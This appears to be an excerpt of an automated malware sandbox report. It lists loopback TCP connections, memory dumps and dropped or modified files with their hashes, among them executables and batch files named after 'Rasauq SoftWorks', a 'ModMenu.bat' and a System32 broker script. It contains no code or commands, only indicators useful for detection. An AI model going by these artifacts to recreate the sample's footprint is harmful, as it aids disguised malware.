N/A 127.0.0.1:54408 tcp
N/A 127.0.0.1:54412 tcp
N/A 127.0.0.1:54425 tcp
N/A 127.0.0.1:54448 tcp
N/A 127.0.0.1:54461 tcp
N/A 127.0.0.1:54464 tcp
N/A 127.0.0.1:54486 tcp
N/A 127.0.0.1:54489 tcp
N/A 127.0.0.1:54510 tcp
N/A 127.0.0.1:54514 tcp
N/A 127.0.0.1:54526 tcp
N/A 127.0.0.1:54538 tcp
N/A 127.0.0.1:54560 tcp
N/A 127.0.0.1:54563 tcp
N/A 127.0.0.1:54575 tcp
N/A 127.0.0.1:54588 tcp
N/A 127.0.0.1:54600 tcp
N/A 127.0.0.1:54612 tcp
N/A 127.0.0.1:54625 tcp
N/A 127.0.0.1:54637 tcp
N/A 127.0.0.1:54649 tcp
N/A 127.0.0.1:54670 tcp
N/A 127.0.0.1:54682 tcp
N/A 127.0.0.1:54685 tcp
N/A 127.0.0.1:54698 tcp
N/A 127.0.0.1:54710 tcp
N/A 127.0.0.1:54722 tcp
N/A 127.0.0.1:54735 tcp
N/A 127.0.0.1:54747 tcp
N/A 127.0.0.1:54768 tcp
N/A 127.0.0.1:54772 tcp
N/A 127.0.0.1:54784 tcp
N/A 127.0.0.1:54796 tcp
N/A 127.0.0.1:54808 tcp
N/A 127.0.0.1:54829 tcp
N/A 127.0.0.1:54833 tcp
N/A 127.0.0.1:54845 tcp
N/A 127.0.0.1:54858 tcp
N/A 127.0.0.1:54870 tcp
N/A 127.0.0.1:54882 tcp
N/A 127.0.0.1:54895 tcp
N/A 127.0.0.1:54907 tcp
N/A 127.0.0.1:54926 tcp
N/A 127.0.0.1:54938 tcp
N/A 127.0.0.1:54970 tcp
N/A 127.0.0.1:54983 tcp
N/A 127.0.0.1:54996 tcp
N/A 127.0.0.1:54999 tcp
N/A 127.0.0.1:55013 tcp
N/A 127.0.0.1:55040 tcp
N/A 127.0.0.1:55053 tcp
N/A 127.0.0.1:55066 tcp
N/A 127.0.0.1:55079 tcp
N/A 127.0.0.1:55098 tcp
N/A 127.0.0.1:55111 tcp
N/A 127.0.0.1:55125 tcp
N/A 127.0.0.1:55148 tcp
N/A 127.0.0.1:55160 tcp
N/A 127.0.0.1:55173 tcp
N/A 127.0.0.1:55177 tcp
N/A 127.0.0.1:55198 tcp
N/A 127.0.0.1:55211 tcp
N/A 127.0.0.1:55224 tcp
N/A 127.0.0.1:55237 tcp
N/A 127.0.0.1:55251 tcp
N/A 127.0.0.1:55263 tcp
N/A 127.0.0.1:55277 tcp
N/A 127.0.0.1:55289 tcp
N/A 127.0.0.1:55302 tcp
N/A 127.0.0.1:55315 tcp
N/A 127.0.0.1:55329 tcp
N/A 127.0.0.1:55342 tcp
N/A 127.0.0.1:55356 tcp
N/A 127.0.0.1:55368 tcp
N/A 127.0.0.1:55381 tcp
N/A 127.0.0.1:55407 tcp
N/A 127.0.0.1:55420 tcp
N/A 127.0.0.1:55433 tcp
N/A 127.0.0.1:55446 tcp
N/A 127.0.0.1:55459 tcp
N/A 127.0.0.1:55484 tcp
N/A 127.0.0.1:55487 tcp
N/A 127.0.0.1:55503 tcp
N/A 127.0.0.1:55515 tcp
N/A 127.0.0.1:55529 tcp
N/A 127.0.0.1:55542 tcp
N/A 127.0.0.1:55556 tcp
N/A 127.0.0.1:55580 tcp
N/A 127.0.0.1:55594 tcp
N/A 127.0.0.1:55607 tcp
N/A 127.0.0.1:55620 tcp
N/A 127.0.0.1:55633 tcp
N/A 127.0.0.1:55646 tcp
N/A 127.0.0.1:55650 tcp
N/A 127.0.0.1:55673 tcp
N/A 127.0.0.1:55686 tcp
N/A 127.0.0.1:55699 tcp
N/A 127.0.0.1:55713 tcp
N/A 127.0.0.1:55726 tcp
N/A 127.0.0.1:55740 tcp
N/A 127.0.0.1:55754 tcp
N/A 127.0.0.1:55777 tcp
N/A 127.0.0.1:55792 tcp
N/A 127.0.0.1:55805 tcp
N/A 127.0.0.1:55819 tcp
N/A 127.0.0.1:55832 tcp
N/A 127.0.0.1:55847 tcp
N/A 127.0.0.1:55860 tcp
N/A 127.0.0.1:55872 tcp
N/A 127.0.0.1:55886 tcp
N/A 127.0.0.1:55899 tcp
N/A 127.0.0.1:55914 tcp
N/A 127.0.0.1:55933 tcp
N/A 127.0.0.1:55956 tcp
N/A 127.0.0.1:55969 tcp
N/A 127.0.0.1:55983 tcp
N/A 127.0.0.1:55996 tcp
N/A 127.0.0.1:56011 tcp
N/A 127.0.0.1:56027 tcp
N/A 127.0.0.1:56030 tcp
N/A 127.0.0.1:56054 tcp
N/A 127.0.0.1:56067 tcp
N/A 127.0.0.1:56080 tcp
N/A 127.0.0.1:56117 tcp
N/A 127.0.0.1:56130 tcp
N/A 127.0.0.1:56143 tcp
N/A 127.0.0.1:56147 tcp
N/A 127.0.0.1:56172 tcp
N/A 127.0.0.1:56184 tcp
N/A 127.0.0.1:56198 tcp
N/A 127.0.0.1:56212 tcp
N/A 127.0.0.1:56226 tcp
N/A 127.0.0.1:56230 tcp
N/A 127.0.0.1:56256 tcp
N/A 127.0.0.1:56279 tcp
N/A 127.0.0.1:56292 tcp
N/A 127.0.0.1:56305 tcp
N/A 127.0.0.1:56319 tcp
N/A 127.0.0.1:56333 tcp
N/A 127.0.0.1:56346 tcp
N/A 127.0.0.1:56360 tcp
N/A 127.0.0.1:56373 tcp
N/A 127.0.0.1:56386 tcp
N/A 127.0.0.1:56392 tcp
N/A 127.0.0.1:56396 tcp
N/A 127.0.0.1:56401 tcp
N/A 127.0.0.1:56405 tcp
N/A 127.0.0.1:56410 tcp
N/A 127.0.0.1:56414 tcp
N/A 127.0.0.1:56420 tcp
N/A 127.0.0.1:56424 tcp
N/A 127.0.0.1:56518 tcp
N/A 127.0.0.1:56531 tcp
N/A 127.0.0.1:56535 tcp
N/A 127.0.0.1:56558 tcp
N/A 127.0.0.1:56580 tcp
N/A 127.0.0.1:56594 tcp
N/A 127.0.0.1:56607 tcp
N/A 127.0.0.1:56621 tcp
N/A 127.0.0.1:56636 tcp
N/A 127.0.0.1:56650 tcp
N/A 127.0.0.1:56663 tcp
N/A 127.0.0.1:56677 tcp
N/A 127.0.0.1:56680 tcp
N/A 127.0.0.1:56701 tcp
N/A 127.0.0.1:56716 tcp
N/A 127.0.0.1:56739 tcp
N/A 127.0.0.1:56753 tcp
N/A 127.0.0.1:56774 tcp
N/A 127.0.0.1:56791 tcp
N/A 127.0.0.1:56805 tcp
N/A 127.0.0.1:56820 tcp
N/A 127.0.0.1:56841 tcp
N/A 127.0.0.1:56858 tcp
N/A 127.0.0.1:56871 tcp
N/A 127.0.0.1:56885 tcp
N/A 127.0.0.1:56899 tcp
N/A 127.0.0.1:56913 tcp
N/A 127.0.0.1:56928 tcp
N/A 127.0.0.1:56950 tcp
N/A 127.0.0.1:56964 tcp
N/A 127.0.0.1:56968 tcp
N/A 127.0.0.1:56993 tcp
N/A 127.0.0.1:57006 tcp
N/A 127.0.0.1:57014 tcp
N/A 127.0.0.1:57035 tcp
N/A 127.0.0.1:57051 tcp
N/A 127.0.0.1:57076 tcp
N/A 127.0.0.1:57089 tcp
N/A 127.0.0.1:57093 tcp
N/A 127.0.0.1:57145 tcp
N/A 127.0.0.1:57147 tcp
N/A 127.0.0.1:57182 tcp
N/A 127.0.0.1:57185 tcp
N/A 127.0.0.1:57210 tcp
N/A 127.0.0.1:57214 tcp
N/A 127.0.0.1:57237 tcp
N/A 127.0.0.1:57241 tcp
N/A 127.0.0.1:57269 tcp
N/A 127.0.0.1:57274 tcp
N/A 127.0.0.1:57309 tcp
N/A 127.0.0.1:57312 tcp
N/A 127.0.0.1:57328 tcp
N/A 127.0.0.1:57331 tcp
N/A 127.0.0.1:57337 tcp
N/A 127.0.0.1:57339 tcp
N/A 127.0.0.1:57354 tcp
N/A 127.0.0.1:57386 tcp
N/A 127.0.0.1:57389 tcp
N/A 127.0.0.1:57446 tcp
N/A 127.0.0.1:57448 tcp
N/A 127.0.0.1:57462 tcp
N/A 127.0.0.1:57476 tcp
N/A 127.0.0.1:57492 tcp
N/A 127.0.0.1:57508 tcp
N/A 127.0.0.1:57521 tcp
N/A 127.0.0.1:57534 tcp
N/A 127.0.0.1:57549 tcp
N/A 127.0.0.1:57567 tcp
N/A 127.0.0.1:57570 tcp
N/A 127.0.0.1:57600 tcp
N/A 127.0.0.1:57615 tcp
N/A 127.0.0.1:57620 tcp
N/A 127.0.0.1:57644 tcp
N/A 127.0.0.1:57659 tcp
N/A 127.0.0.1:57673 tcp
N/A 127.0.0.1:57698 tcp
N/A 127.0.0.1:57713 tcp
N/A 127.0.0.1:57727 tcp
N/A 127.0.0.1:57742 tcp
N/A 127.0.0.1:57759 tcp
N/A 127.0.0.1:57763 tcp
N/A 127.0.0.1:57810 tcp
N/A 127.0.0.1:57824 tcp
N/A 127.0.0.1:57838 tcp
N/A 127.0.0.1:57841 tcp
N/A 127.0.0.1:57866 tcp
N/A 127.0.0.1:57880 tcp
N/A 127.0.0.1:57884 tcp
N/A 127.0.0.1:57909 tcp
N/A 127.0.0.1:57932 tcp
N/A 127.0.0.1:57940 tcp
N/A 127.0.0.1:57943 tcp
N/A 127.0.0.1:57968 tcp
N/A 127.0.0.1:57972 tcp
N/A 127.0.0.1:57985 tcp
N/A 127.0.0.1:58015 tcp
N/A 127.0.0.1:58017 tcp
N/A 127.0.0.1:58040 tcp

Files

memory/4464-0-0x00007FF97EB03000-0x00007FF97EB05000-memory.dmp

memory/4464-1-0x0000000000560000-0x000000000057A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

MD5 12a225de8199d2a31f049a6f300d8cfa
SHA1 24819a452cf1db15167a52b12f258d27baacbd6e
SHA256 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801
SHA512 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32

memory/4464-10-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

MD5 7091469b8f2213255ba3c2870a60c7eb
SHA1 17e501e4900bf5dacc5cb0424db87d2ce7a89880
SHA256 d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7
SHA512 f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8

memory/2080-28-0x0000000000980000-0x000000000098E000-memory.dmp

memory/5228-29-0x0000000000F40000-0x0000000000F5A000-memory.dmp

memory/5228-31-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

memory/2080-33-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

memory/4464-32-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Launch.bat

MD5 41bded52aa489cdea31a174f89bca818
SHA1 da072fb11e72d2762f96d0f901d7ef7bca17218d
SHA256 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59
SHA512 d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9

C:\Users\Admin\AppData\Local\Temp\ModMenu.bat

MD5 48e8089eae5c8c602b20696cf2840f50
SHA1 b02784c1b5e3fa8a3f2a1ff615870719aeda2b16
SHA256 ab3e6e5835550f067ce594533afba7c8c3320891298ebb6fb76f7bdc8b049174
SHA512 38f90b076c34ff3e25750a69c8b506897d8b0ed2d4a113cbabd496c06b337a206b1a21fde667bef207276bf36e986ab58d384e5467c2ac38280394fa3d27cd10

memory/4972-45-0x000001F445060000-0x000001F4450E6000-memory.dmp

memory/4972-55-0x000001F445200000-0x000001F445304000-memory.dmp

memory/4972-56-0x000001F445000000-0x000001F445022000-memory.dmp

memory/4972-54-0x000001F42C910000-0x000001F42C920000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xp5bsiq.bn3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 9c641493f463ea0f418e229be7b384ad
SHA1 c2e41f792970c65a36869125304956e1ff2c4727
SHA256 b846abd32e1d5976dedf646cf4af48aa83e7a44fa2ec49ca69bba79e5a54633d
SHA512 c3746ab0f9c0d4f01ac396d8a516d2c65e513820222fd0b9a54c9ae7b0faf1f91b54fa3153f62312e96d6e76b334e42f1f9c97f630c50ecb519642332619308b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1cebd15e19078003226326aa50667159
SHA1 6d346e2ff9b8b6834a3e4b58240c41f5178e57f9
SHA256 ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe
SHA512 81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 cf3bb14e0c83a42f2816ee7b618c5e20
SHA1 b7aba5689a4f9ea64d7b84080fdd3ceb480b6479
SHA256 1b8e622c06028a69920c094ddb35c1d4a403e57f6cf4ac436f007ce5ca55d75f
SHA512 4bf26aaa8a5c067d8545ca096353bf3cde151814fcc931858d9446181357226388f589a89cd4bd4f366454d029b4c9119bd86c0e426986afaeebdec83af968c0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e07eea85a8893f23fb814cf4b3ed974c
SHA1 8a8125b2890bbddbfc3531d0ee4393dbbf5936fe
SHA256 83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea
SHA512 9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

C:\Users\Admin\AppData\Local\Temp\IMG_3728.png

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4093e5ab3812960039eba1a814c2ffb0
SHA1 b5e4a98a80be72fccd3cc910e93113d2febef298
SHA256 c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c
SHA512 f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da135dd054f4d60d35617da0fea2c263
SHA1 8d28cb50ae7775e54fe6b77b5c6c486d1f016aad
SHA256 0e5c4ecd696d501ddf5f36a0ba78375607afa23b5773f80079a0a65df0cb9037
SHA512 38dd1d0f06fa8a7c410021493dd8ed2fd47cfb9cc8acfd8c22409a5e9cd59874e3df5ba94de16eabc63d1961d233500f84069b1e33aa184da63c0a2bd7fb4a84

C:\Windows\System32\Recovery\ReAgent.xml

MD5 910f3916ede823b6b4b5e302e6ececbe
SHA1 d41dda3f32687605193ad0f421c6b3e2bc48ec97
SHA256 5cd6fa01b3949b7fca0fdbdab434d93badcfcdf09de8e2881268abf7ed7064fa
SHA512 893f4a7f2cb3b6aa2ebd0e82f1ab55658b4e7791872bfb97dd269c35df0199c9b590e0902a83cfc8ae85f883f8adb6f514593d4dde68d2c0a5406ecc7851f582

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_FEC6341EA56F49E6A6B9046EA09BF823.dat

MD5 e8f06dc3412e11a884caae4029ee3a75
SHA1 7145f085e901328329d7bee0284d1bd4ae8acb05
SHA256 4724b5c0cc5b00fea2b852a0a2204216ab13f76166a53562444c1ce19c2de75f
SHA512 64330366377f7a0a893ae2f8d71d27af3b6c75b27289f96e721887dedbb304d794c6fedbbdf03ce5f94d4c3fb0b06ebcca852fd3af2b694f8ce3479a6918be41

memory/2080-165-0x000000001D2E0000-0x000000001D322000-memory.dmp

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 a4decb7fb1e423f2404a56ab1f65a907
SHA1 1e45fdc45ce92e461d1765870e2548374dd65f57
SHA256 d0930146e00fd4be9d7644b5fac04e127d9f4d409fe57f4d64bae8383ddc3cc5
SHA512 f1a3ea5484016e5fbb3c857d3bf4666cec5707bdfaf2063638a35101bfa29cbc3747e31672e8c2772e4c53f0cc83453dfe202a2380e65601ec631dedf8d821d1

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 62da0914b34786cc72b0a513c1d027e9
SHA1 c77eee5b56160402f3060ad64fdb0cd5ff730233
SHA256 b8e1414e0fa30d6d2309f070285a3b5cac056f878bf07702c957b243718b99a9
SHA512 f36acb087e1942ad8999cc291eb37e1dd6adba38535c112c94e0260e11c03ceea96f47dbfa9dfb3e0f708860a3641bb664750a6fe149d3b525b37b7da5eba166

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 a62ffbfda792b7a5b82e9e4c811136f8
SHA1 b0b0df4a14352937ce3e51489bb9f4bcf9277767
SHA256 413f51c6bb954ca181537ae42d3b1860d52a44ae9c0b4ff2412e2f3058113280
SHA512 1e3e7a1c70001a41570b813cc5e0ea76607fd2d25bb349641570efc47d264e9c4c8e29b3a51fd5fe1cb8c83e6ea42ff0f6af62c1e54c80133dd60f1255c73cc2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 be40db6c8fd0d8b32dd97d14f10f8d1c
SHA1 b0f3a526f60d03ca3e0e6ecd5340358b0d345768
SHA256 cca996ce3a1fb9cc44bcacc9002798fc66eab27146004d38e65ef98539510f66
SHA512 0c595146fef4919951f9f04b2f13a03094d51c87063882ffe9beb1f1b0e36fb08ca3ff53bdf0bf1c234e02ac7f878fe5bf185ec8db2c437651e74a9a47414f4f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 80b42fe4c6cf64624e6c31e5d7f2d3b3
SHA1 1f93e7dd83b86cb900810b7e3e43797868bf7d93
SHA256 ee20a5b38a6674366efda276dbbf0b43eb54efd282acfc1033042f6b53a80d4d
SHA512 83c1c744c15a8b427a1d3af677ec3bfd0353875a60fe886c41570981e17467ebbb59619b960ca8c5c3ab1430946b0633ea200b7e7d84ab6dca88b60c50055573

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0a85f07903eaad4aace8865ff28679f
SHA1 caa147464cf2e31bf9b482c3ba3c5c71951566d1
SHA256 c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5
SHA512 7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 311174334b8e31fc10d28c4575e92688
SHA1 e2b2b2100f0445b4d37cd16f82d3cfcca3abf335
SHA256 793aa8f317799c4ad031a7ba58960643c29f03a24b2baba577cc1ccdcbe46a76
SHA512 e7ddc1cf4443564bee7f00a66f2e533d1d89f6ab9434ea75ae7aeec4e8aa56ba40d27c81e472c92724fc892a7726232280274397d3506d95275af41337fc0135

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0b59f3fa12628f63b5713c4833570d7f
SHA1 badcf18f1fdc94b1eadf63f27c09ad092c4a6ccb
SHA256 2332e52881483559d787508831c00192c4f0a4fedc232b0309e566a30247af1d
SHA512 01724fd9f7a20ec5ff3d2686593d5d95069135834e9b156ced36985067fb36e7b3ec2a0018e41fa125ad5d1e42c80be9e148632a9b655f2d41c1400a4320abe7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7beb7e466697232c9e7428a14c08099
SHA1 8565273d9ffc49170849c80b8c9d8f6b95b45376
SHA256 30b250907b357d4192ab1fd59c4355ebf9f1083c1f41e54e7068a4358fc0af81
SHA512 001217e0d0d6db19bcf5672246cf567449750ae56b1399c28dcb53951af90ddd19f77d3159d9779d51713d180ebc36fcdaf06db80b4885bd907b3c8832d2d98e

C:\Windows\System32\drivers\etc\hosts

MD5 a37a771cb0d99a67e2c2f874617f651f
SHA1 d8c6399e0788602d09274a517ebe5bc0748aff49
SHA256 cd0a4b242a5fb807396265e62e60ef3183798b645ba605bd73843c65c9f965ce
SHA512 a448985a53ba7efe5ffd1d953f1450404b8812074b8c10f6c97fc0225318ec77f539ff5b55d2b72b2cdbe1b395b88cd262b0454fea0717e0c36bfd3918d22209

memory/5228-266-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 c84af9ede4c93ac47aedace7ed31e074
SHA1 b2d2b133dcd227805ff1ff9b713d7703d799080c
SHA256 c02ef00939218bd0bd8b1320a45eb12ee5d9602fa34b0393d7d810d77d051b31
SHA512 630ebe6e97c1d65593edd76cca1cee56544875adea2b90d89c0fc8fa872c845e0deeb400c9109a3404958114a7fa3492c1608926d5ab6e907c43b48c205d125f

C:\Windows\INF\cdrom.PNF

MD5 51d202839e64aea21820be5889d9e4db
SHA1 d40617bac03de830d2aa0ad22553701c10add79a
SHA256 d0fda023db84c5301f310babf7b8507fdcb5b2358187629cee9bbfa724a61fde
SHA512 edf9d0a6d382c6f446687bf2d5ec547074de24822bb0ccfaf26efb76f88323fc758f3226eda1e83f6bc0260b201de61acc0f4d3614194bae9b864aa62e5adc1e

C:\Windows\INF\printqueue.PNF

MD5 8e663b6b1b218909260efe0aafd02ac8
SHA1 036ef8a98f5fc5cdbe41874ae0259cf138678c67
SHA256 ead39a83315c7d65f024833556d2a79c4debd0ce24928981f0c9642e910ebbbe
SHA512 2558c239133833f37902072597a2634ca989846bfe9a43dd6ca2c134d141d1088d80474c8530cd38bdd42faf95e51171b681518103d511a41e958a03c38b135d

C:\Windows\INF\netrtl64.PNF

MD5 99d1c7023c6e86d02f1cd3d9cf8c356d
SHA1 343085219dc37cea79a8b5d675f107a2c2965b75
SHA256 6c0bbcf4065d128576ab8f4502afbd9495387bd66d13f0ae05e7058ad6615043
SHA512 34b0e561ba12da4ff2eff99b724d0d2b9fb7cc150f22772970aa6d4ad37652ae650489bbe43ec706fa25ea6e4b3c33f3e793bfdbab1fd5c1ddb9edfd9ad727a2

C:\Windows\INF\input.PNF

MD5 335195d9951525feca205919212dee44
SHA1 e91694f839cf6e1364c4798f56fa161f811c7139
SHA256 2969ca3f06c4aa8f5ffe871199e8e9883a18b5b927fb7810ac7998e7aa7efc6b
SHA512 fdfb51a4f760e94b3ca9ba9ec8642bfcd94eee2bdb3df436e17352c8538c0f97df0a736678a6951dc74d908121c28e6d6d6753bf8d4c9d4ed38b9ad8188c8714

memory/2080-318-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp

C:\Windows\INF\audioendpoint.PNF

MD5 bcfe0caff384393ee934e4c718943758
SHA1 62d28e33fd5529bc728753ff88b2efd1c9bfa9f6
SHA256 9339ec09c41976c41e99c75c32bdfd2f7626286e9ee3d455e2b5e9f1b259f2ba
SHA512 0fb55173411948e5ce85474fd02b32e0622a7a945a1bd802c87f97e4ed7366a86ed159a86d138f2c3949459ca45b454bf259f4dc40af58337397567ae4552f31

C:\Windows\INF\volmgr.PNF

MD5 d7936ee1fa6c908b5c06c6bc40eeed8b
SHA1 36efcb724f301a2b0e66eb321ca0be697c4d294b
SHA256 6514032e24de6905926eb7356ea9f6f6b3ee52a18b70fc7e87d95a074484b55a
SHA512 21d6aa35622da61fb3f1aff9e47ee17aa1adf0143ced7454931d4361584ebd2681a75fcbddde381be1e415565d0dbbbcc48b0454a55e9895848bf379836ffa2c

C:\Windows\INF\monitor.PNF

MD5 d6e9f9248f9ccc90f7a70e1ecc9e1a78
SHA1 bf97315111a64611ac94b0a86107b32aa5857070
SHA256 f7293fef8bf3b2817b2b235db2da537b44462af7fe95a76ecd5f6aaf0e7957ab
SHA512 0954f22a5197a25aec64aeae74d89feaae93d1bebf416a2b08c1d39ba5320707b50806f7254ef63f0e955733e4961674b985ac56a96a9b7f12a61815d2103f3b

C:\Windows\INF\keyboard.PNF

MD5 4e797204d9109d6b58572b132687e6c7
SHA1 d39f5decf1076dfd522c37e49d9d86814ce621c4
SHA256 2d3b6bc70181b072dd77298096669e8ef4ffa77d28621c7c004203185d48c99f
SHA512 7a81c291cb0d42d5aed09720ac0841de6406dbdb28cc757a16cf5f73d7a44b7b1e9eef8156b3bc9796ab44bb67b3f0be2ca63cd2b538b888eed2d7145f2b48e5

C:\Windows\INF\compositebus.PNF

MD5 eb6f6d2b90d0ba6667f373d943b65d09
SHA1 8f03383cac305011f948c36d962b5ccfe2a0f2c0
SHA256 af8e47c370461c672a0d332ceef4b28f93371ffc672ce55826e621a650853ea5
SHA512 8e1b2c50c13b264b87cdfb6c6bb814ac8f6e441a0668c35676a4db4902c3219901b6fbccbc622badc54b4452056eef8a21ca37bbdd6436447fcdee09b8c53943

C:\Windows\INF\acpi.PNF

MD5 2219f9a3eda0e0349cb76df9abc9d10d
SHA1 1acd70887e2217fbcb8df59b53dfbbf107eb46df
SHA256 5d7a91735f3e20ed5c3376d55c3a3313f8c7dc9cbcb990fa3228bf9b44aa503d
SHA512 808c57da78983625788c115c63365a6baa9d28226ea749f572cb2b01465eb87a61965e64368fa87b95dff67d8bd2975116ddb2ea01bffb36eb14ec72dd8798db

C:\Windows\INF\msmouse.PNF

MD5 fcfca2194cac88ba601031947675fadf
SHA1 87026bda6004146de7a62a7fedfe1fb56e9a017e
SHA256 34a0901cf4b2e444a24bfab742af19c8a54c2e9cd59210cca12254ee20ea2024
SHA512 fdc1a71728a8a3efebc7e764cec38d4f01a895e98691eca8c230efe81055e0e5dc5d7b37f2f658283fe5686778c64268db781e7ea07927d6ab927f77b1fa31a6

C:\Windows\INF\swenum.PNF

MD5 79e4d57ef6b88bd1e20e10d5fc51c08a
SHA1 947f15e91b3e7f98b9610e8b2f0156cd47261f1a
SHA256 bcb10f963dd4478a3afe6d8e4f3b67a894be9b55139b97ecd9ab4cba5d52cf1b
SHA512 d1c50604d0a8edcb27b1ec5bea6c80d01ec46cf4172483af8e513e8aeaf97647f4f7e0ba0f5f3ac5c40f496b61eb4ec1ab5cdea87f9cd0191e7caee8406f1c94

C:\Windows\INF\rdpbus.PNF

MD5 850954b1d1803cd765bd3a02a3b217a9
SHA1 cf153ebdcc3f428e0a97fe13659821cc6dea722c
SHA256 8225dc79ae71f7759c99ab47e182e3f0de86b33987a0adbc109b1dc58dfe13bf
SHA512 1b9800d0648b0b07a35afdc3a9f98ff289fae4412b980f4c611d3e738d46682007985ab3beb83d9632281a6dbfbfb3a12c79d59a4f65990347ceaee7f4eb74e7

C:\Windows\INF\mssmbios.PNF

MD5 526443b67acd8a9460df1bd6d749d296
SHA1 8df1f8d6cfc07d02c35b879490627c260762bc83
SHA256 ed9cb1ee86ce295162e1096cfa481450cf845c2f25eaa293f8f4f31c8120c526
SHA512 3bfd08204e2409e0ea6d85bbc5bed2815bec68e1c1defe825f373fd60fff520bfceb86ab57896f842912c4f7f4af1af7bfdc523751bf1cbf1a2e579e62bf8b0b

C:\Windows\INF\cpu.PNF

